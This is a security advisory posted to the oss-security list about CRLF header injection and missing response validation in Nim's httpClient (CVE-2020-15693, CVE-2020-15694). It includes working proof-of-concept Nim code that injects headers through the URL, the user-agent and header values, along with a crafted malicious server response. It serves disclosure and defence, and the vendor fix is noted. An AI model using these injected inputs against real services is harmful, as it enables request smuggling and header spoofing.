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Date: Thu, 4 Feb 2021 11:36:50 +0100
From: Martin Ortner <martin.ortner@...sensys.net>
To: oss-security@...ts.openwall.com
Subject: [CVE-2020-15693, CVE-2020-15694] Nim - stdlib HttpClient - Header
Crlf Injection & Server Response Validation

title: "Nim - stdlib HttpClient - Header Crlf Injection & Server Response Validation"
date: 2020-07-30T18:41:52+01:00

cve: ["CVE-2020-15693", "CVE-2020-15694"]
vendor: nim-lang
vendorUrl: <https://nim-lang.org/>
authors: tintinweb
affectedVersions: ["<= 1.2.6"]
vulnClass: CWE-93

Vulnerability Note: <https://consensys.net/diligence/vulnerabilities/nim-httpclient-header-crlf-injection/>
Vulnerability Note: <https://github.com/tintinweb/pub/blob/master/pocs/cve-2020-15694/>
Group: <https://consensys.net/diligence/research/>

Summary

The following vulnerability note discusses two classes of vulnerabilities found in the nim-lang `httpClient` standard library:

- * a `CR-LF` injection in various arguments
- * lack of response value validation when parsing server responses

Details

Description

The nim standard library `httpClient` is vulnerable to a `CR-LF` injection in the target url. This issue shares similarities with [CVE-2019-9740] (<https://nvd.nist.gov/vuln/detail/CVE-2019-9740>) and [CVE-2019-9947] (<https://nvd.nist.gov/vuln/detail/CVE-2019-9947>) reported for the Python language with the difference that more injection vectors exist. An injection is possible if the attacker controls any part of the url provided to `httpClient.get|post|...`, the user-agent, or custom http header names or values.

Additionally, the library fails to properly validate the server response. For example, `httpClient.get().contentLength()` does not raise any error if a malicious server provides a negative `Content-Length`.

It should be noted that there seems to be a general lack of input validation (requests and response) and we expect more vectors to exist (e.g. see `generateHeaders`).

Proof of Concept

Note: `nim c -r -d:ssl client_inject.nim`

1) header injection in any url part

a) query

```
```nim
import httpClient
var client = newHttpClient()
var response = client.get("https://localhost:4433?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body()
```
```

Serialized request: see `X-injected`

```
```http
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123 HTTP/1.1
Host: localhost:4433
Connection: Keep-Alive
content-length: 0
user-agent: Nim httpClient/1.2.4
```
```

b) in the path

```
```nim
import httpClient
var client = newHttpClient()
var response = client.get("https://localhost:4433/a/1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body()
```
```

Serialized request: see `X-injected`

```
```http
GET /a/1 HTTP/1.1
X-injected: header
TEST: 123 HTTP/1.1
Host: localhost:4433
Connection: Keep-Alive
content-length: 0
user-agent: Nim httpClient/1.2.4
```
```

2) header injection in user-agent, http headers

```
```nim
import httpClient
var client = newHttpClient("MyUserAgent\r\nX-Injected: myheader")
client.headers = newHttpHeaders({ "Content-Type": "applicat\r\nion/json" })
var response = client.get("https://localhost:4433?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body()
```
```

Serialized request: see `X-injected`, `TEST: 123`

```
```http
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123 HTTP/1.1
Host: localhost:4433
Connection: Keep-Alive
content-length: 0
content-type: applicat
ion/json
user-agent: MyUserAgent
X-Injected: myheader
```
```

3) Integers are parsed as signed ints instead of natural numbers

The `httpClient` silently accepts invalid return parameters. For example, the content-length header is initially stored as a string without being verified to be in a proper range. When

accessing it, it is being parsed as a signed integer and therefore allows to return negative numbers.

```
``nim
proc contentLength*(response: Response | AsyncResponse): int =
  ## Retrieves the specified response's content length.
  ##
  ## This is effectively the value of the "Content-Length" header.
  ##
  ## A ``ValueError`` exception will be raised if the value is not an integer.
  var contentLengthHeader = response.headers.getOrDefault("Content-Length")
  return contentLengthHeader.parseInt()
````
```

```
Request:
``http
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123 HTTP/1.1
Host: localhost:4433
Connection: Keep-Alive
content-length: 0
user-agent: Nim httpClient/1.2.4
````
```

```
Malicious server response: `Content-Length: -23`
``http
HTTP/1.1 200 OK
Date: Sun, 10 Oct 2010 23:26:07 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 26 Sep 2010 22:04:35 GMT
ETag: "45b6-834-49130cc1182c0"
Accept-Ranges: bytes
Content-Length: -23
Connection: close
Content-Type: text/html
Hello world!
````
```

Accessing the `Content-Length` yields the negative number -23.

```
``nim
import httpClient
var client = newHttpClient()
var response = client.get("http://localhost:4433/a/1 HTTP/1.1\r\nX-i\x00\x01YOnjected: header\r\nTEST: 123")
echo response.contentLength()
echo response.body()
````
```

output:

```
````
⇒ nim c -r -d:ssl client_inject.nim
...
Hint: [Link]
Hint: 112071 LOC; 1.103 sec; 112.691MiB peakmem; Debug build; proj: /Users/tintin/workspace/nim/test/issues/httpclient/inject/client_inject.nim; out:
/Users/tintin/workspace/nim/test/issues/httpclient/inject/client_inject [SuccessX]
Hint: /Users/tintin/workspace/nim/test/issues/httpclient/inject/Client_inject [Exec]
-23
````
```

This might pose a risk to applications that are not checking whether response values are within sane bounds.

Vendor Response

Vendor response: fixed in [v1.2.6] (<https://nim-lang.org/blog/2020/07/30/versions-126-and-108-released.html>)

Timeline

```
````
JUL/09/2020 - contact nim developers @telegram; provided details, PoC
JUL/30/2020 - fixed in new release
````
```

References

- * [1] <https://nim-lang.org/>
- * [2] <https://nim-lang.org/install.html>
- * [3] [https://en.wikipedia.org/wiki/Nim_\(programming_language\)](https://en.wikipedia.org/wiki/Nim_(programming_language))
- * [4] <https://nim-lang.org/blog/2020/07/30/versions-126-and-108-released.html>

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